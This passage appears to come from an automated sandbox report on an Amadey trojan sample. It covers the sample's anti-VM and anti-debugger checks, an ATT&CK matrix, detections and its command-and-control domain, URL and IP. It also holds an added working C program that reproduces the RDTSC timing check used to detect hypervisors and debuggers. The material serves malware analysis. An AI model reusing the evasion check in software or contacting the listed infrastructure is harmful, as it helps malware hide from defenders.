ecx 0x0000005a push eax 0x0000005b push edx 0x0000005c pushad 0x0000005d jmp 00007FD934C4561Bh 0x00000062 mov di, si 0x00000065 popad 0x00000066 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 7040425 second address: 704042B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 704042B second address: 704042F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 704042F second address: 7040442 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e mov cx, 8975h 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 7040442 second address: 7040448 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 7040448 second address: 704044C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 70401FE second address: 7040218 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C45626h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 7040218 second address: 7040251 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97DBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007FD934BC97E6h 0x0000000f push eax 0x00000010 jmp 00007FD934BC97DBh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 7040251 second address: 7040257 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 7040257 second address: 7040287 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, eax 0x00000005 call 00007FD934BC97E4h 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov ebp, esp 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 call 00007FD934BC97DAh 0x00000018 pop ecx 0x00000019 push edx 0x0000001a pop ecx 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 7040062 second address: 7040078 instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, di 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dx, E2A8h 0x0000000b popad 0x0000000c pop ebp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 mov ecx, 3AE0259Fh 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD01DC second address: 6FD01E0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD01E0 second address: 6FD01EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 xchg eax, ebp 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD01EE second address: 6FD01F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD01F2 second address: 6FD01F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD01F6 second address: 6FD01FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD01FC second address: 6FD023F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD934C45622h 0x00000008 pushfd 0x00000009 jmp 00007FD934C45622h 0x0000000e adc si, 8278h 0x00000013 jmp 00007FD934C4561Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c push eax 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 mov ebx, ecx 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD023F second address: 6FD0296 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d mov cx, di 0x00000010 pushfd 0x00000011 jmp 00007FD934BC97E7h 0x00000016 xor esi, 2AF3444Eh 0x0000001c jmp 00007FD934BC97E9h 0x00000021 popfd 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD0430 second address: 6FD043F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD043F second address: 6FD0457 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97E4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FC0EAD second address: 6FC0ED9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jmp 00007FD934C45623h 0x00000012 mov bx, si 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FC0ED9 second address: 6FC0F03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD934BC97DDh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FC0F03 second address: 6FC0F18 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edi, 69D71CA2h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f movsx edx, ax 0x00000012 mov ebx, ecx 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD0019 second address: 6FD0023 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 69CB3B62h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD0023 second address: 6FD0038 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push ebx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD934C4561Bh 0x0000000f rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD0038 second address: 6FD0064 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007FD934BC97DFh 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop ecx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD934BC97DDh 0x0000001a rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD0064 second address: 6FD0068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD0068 second address: 6FD006E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD006E second address: 6FD008E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934C4561Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD934C4561Ah 0x00000014 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD008E second address: 6FD0092 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD0092 second address: 6FD0098 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FD0098 second address: 6FD00A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934BC97DDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FE0BD3 second address: 6FE0BE4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FD934C4561Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FE0BE4 second address: 6FE0C02 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD934BC97E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FE0C02 second address: 6FE0C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FE0C06 second address: 6FE0C0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FE0C0C second address: 6FE0C12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | RDTSC instruction interceptor: First address: 6FE0C12 second address: 6FE0C16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Special instruction interceptor: First address: 99F9EB instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Special instruction interceptor: First address: B46D2A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Special instruction interceptor: First address: B4E9A0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Special instruction interceptor: First address: BCC849 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_2_00459980 rdtsc | 0_2_00459980
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe TID: 7932 | Thread sleep time: -30000s >= -30000s
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | File Volume queried: C:\ FullSizeInformation
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_2_0027255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses | 0_2_0027255D
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_2_002729FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle | 0_2_002729FF
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_2_0027255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,SHGetKnownFolderPath,FindFirstFileW,FindNextFileW,K32EnumProcesses | 0_2_0027255D
Source: 5Jat5RkD3a.exe, 5Jat5RkD3a.exe, 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: 5Jat5RkD3a.exe | Binary or memory string: Hyper-V RAW
Source: 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: 5Jat5RkD3a.exe, 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: 5Jat5RkD3a.exe, 00000000.00000002.1560405942.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538068178.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1537557313.00000000017D3000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: 5Jat5RkD3a.exe, 00000000.00000003.1489699515.0000000006891000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlO#
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Process information queried: ProcessInformation
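Every "RDTSC instruction interceptor" entry above has the same shape: rdtsc, a run of filler that leaves the result registers alone (push/pop of eax and edx, pushad/popad, pushfd/popfd around arithmetic on a scratch register, short jmps to the next instruction), then rdtsc again, and the second address of one entry is the first address of the next, so the sample takes a long chain of back-to-back timestamps. What it measures is the cost of RDTSC itself: on bare metal two adjacent reads are a few dozen cycles apart, while a hypervisor that traps RDTSC, or a debugger single-stepping through the filler, inflates the gap by orders of magnitude. The C program below is an added example written for this page, not code from the sample or from the report, that performs the same measurement and decision. The 500-tick threshold, the 1000-sample minimum and the clock_gettime fallback on non-x86 builds are assumptions of the example; it needs gcc or clang for the inline assembly.

```c
/* Added example: the RDTSC-pair timing check the interceptor log records.
 * Not code from the sample or from the sandbox report. */
#define _POSIX_C_SOURCE 199309L
#include <stdint.h>
#include <stdio.h>
#include <time.h>

/* Read a 64-bit timestamp. On x86 this is the same RDTSC the sample executes
 * (result in EDX:EAX); elsewhere the example falls back to the monotonic clock
 * in nanoseconds so that it still builds and runs (assumed fallback). */
uint64_t read_tsc(void)
{
#if defined(__x86_64__) || defined(__i386__)
    uint32_t lo, hi;
    /* volatile: the two reads in rdtsc_pair_delta() must not be reordered or merged */
    __asm__ __volatile__("rdtsc" : "=a"(lo), "=d"(hi));
    return ((uint64_t)hi << 32) | lo;
#else
    struct timespec ts;
    clock_gettime(CLOCK_MONOTONIC, &ts);
    return (uint64_t)ts.tv_sec * 1000000000ULL + (uint64_t)ts.tv_nsec;
#endif
}

/* One measurement: rdtsc; <filler>; rdtsc. The filler in the log (push/pop,
 * pushad/popad, jmp to the next byte) changes nothing the result depends on;
 * the delta is dominated by the cost of RDTSC itself. */
uint64_t rdtsc_pair_delta(void)
{
    uint64_t t0 = read_tsc();
    __asm__ __volatile__("" ::: "memory");   /* stands in for the junk filler */
    uint64_t t1 = read_tsc();
    return t1 - t0;
}

/* Take `samples` deltas and keep the smallest. A single pair is noisy
 * (interrupts, context switches); the minimum is the undisturbed cost. */
uint64_t min_pair_delta(int samples)
{
    uint64_t best = UINT64_MAX;
    for (int i = 0; i < samples; i++) {
        uint64_t d = rdtsc_pair_delta();
        if (d < best)
            best = d;
    }
    return best;
}

/* The decision. `threshold` is an assumed cut-off in ticks, not a value taken
 * from the sample. Returns 1 when the gap says "trapped or single-stepped". */
int looks_instrumented(uint64_t min_delta, uint64_t threshold)
{
    return min_delta > threshold;
}

int main(void)
{
    const uint64_t threshold = 500;   /* assumption: bare metal is well below this */
    uint64_t d = min_pair_delta(1000);
    printf("min rdtsc pair delta: %llu ticks -> %s\n",
           (unsigned long long)d,
           looks_instrumented(d, threshold) ? "instrumented (VM exit or debugger?)"
                                            : "looks like bare metal");
    return 0;
}
```

Run it once on a physical host and once inside the analysis VM: if the VM's minimum is an order of magnitude above the host's, a check like the one in this sample classifies the VM as instrumented, which is why a sandbox has to hook or emulate RDTSC rather than let the sample observe the raw trap cost.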

Anti Debugging

Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_2_0700068D Start: 070007E8 End: 070007E2 | 0_2_0700068D
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_2_070006C9 Start: 070007E8 End: 070007E2 | 0_2_070006C9
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | File opened: NTICE
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | File opened: SICE
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Code function: 0_2_00459980 rdtsc | 0_2_00459980
Source: 5Jat5RkD3a.exe, 5Jat5RkD3a.exe, 00000000.00000002.1558804548.0000000000B28000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: gProgram Manager
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\5Jat5RkD3a.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: procmon.exe
Source: 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.10:49702 -> 185.121.15.192:80
MITRE ATT&CK Matrix (a number in parentheses is the count of signatures matched for that technique; techniques without a number matched no signature)
Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
Execution: Command and Scripting Interpreter (2); Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Privilege Escalation: Process Injection (1); DLL Side-Loading (1); Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
Defense Evasion: Virtualization/Sandbox Evasion (24); Process Injection (1); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (3); Software Packing (12); DLL Side-Loading (1)
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
Discovery: Security Software Discovery (751); Virtualization/Sandbox Evasion (24); Process Discovery (13); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (216)
Lateral Movement: Exploitation of Remote Services (1); Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
Collection: Archive Collected Data (11); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
Command and Control: Encrypted Channel (11); Ingress Tool Transfer (2); Non-Application Layer Protocol (3); Application Layer Protocol (4); Fallback Channels; Multiband Communication
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop

Antivirus detection (Source | Detection | Scanner | Label)
5Jat5RkD3a.exe | 49% | Virustotal |
5Jat5RkD3a.exe | 53% | ReversingLabs | Win32.Trojan.Amadey
5Jat5RkD3a.exe | 100% | Avira | TR/Crypt.TPM.Gen
5Jat5RkD3a.exe | 100% | Joe Sandbox ML |
Dropped files, unpacked PE files, domains, URLs: No Antivirus matches
Contacted domains (Name | IP | Active | Malicious | Reputation)
home.twentytk20ht.top | 185.121.15.192 | true | false | high
httpbin.org | 34.226.108.155 | true | false | high
Contacted URLs (Name | Malicious | Reputation)
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850 | true | unknown
https://httpbin.org/ip | false | high
URLs from memory and binary data (Name | Source | Malicious | Reputation)
https://curl.se/docs/hsts.html | 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | false | high
http://html4/loose.dtd | 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | false | high
https://curl.se/docs/alt-svc.html# | 5Jat5RkD3a.exe | false | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850?argument= | 5Jat5RkD3a.exe, 00000000.00000002.1560405942.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538068178.00000000017D6000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1537557313.00000000017D3000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://httpbin.org/ipbefore | 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | false | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850se | 5Jat5RkD3a.exe, 00000000.00000002.1560049226.000000000176A000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538377629.0000000001766000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://curl.se/docs/http-cookies.html | 5Jat5RkD3a.exe, 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | false | high
https://curl.se/docs/hsts.html# | 5Jat5RkD3a.exe | false | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850http://home.twentytk20ht.top/TQIuuaqjNpwY | 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp | false | unknown
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFojm1734579850::3 | 5Jat5RkD3a.exe, 00000000.00000002.1560049226.000000000176A000.00000004.00000020.00020000.00000000.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1538377629.0000000001766000.00000004.00000020.00020000.00000000.sdmp | false | unknown
https://curl.se/docs/http-cookies.html# | 5Jat5RkD3a.exe | false | high
https://curl.se/docs/alt-svc.html | 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | false | high
http://home.twentytk20ht.top/TQIuuaqjNpwYjtUvFoj850 | 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | false | unknown
http://.css | 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | false | high
http://.jpg | 5Jat5RkD3a.exe, 00000000.00000002.1556804870.0000000000831000.00000040.00000001.01000000.00000003.sdmp, 5Jat5RkD3a.exe, 00000000.00000003.1447796271.00000000072E0000.00000004.00001000.00020000.00000000.sdmp | false | high
Contacted IPs (IP | Domain | Country | ASN | ASN Name | Malicious)
185.121.15.192 | home.twentytk20ht.top | Spain | 207046 | REDSERVICIOES | false
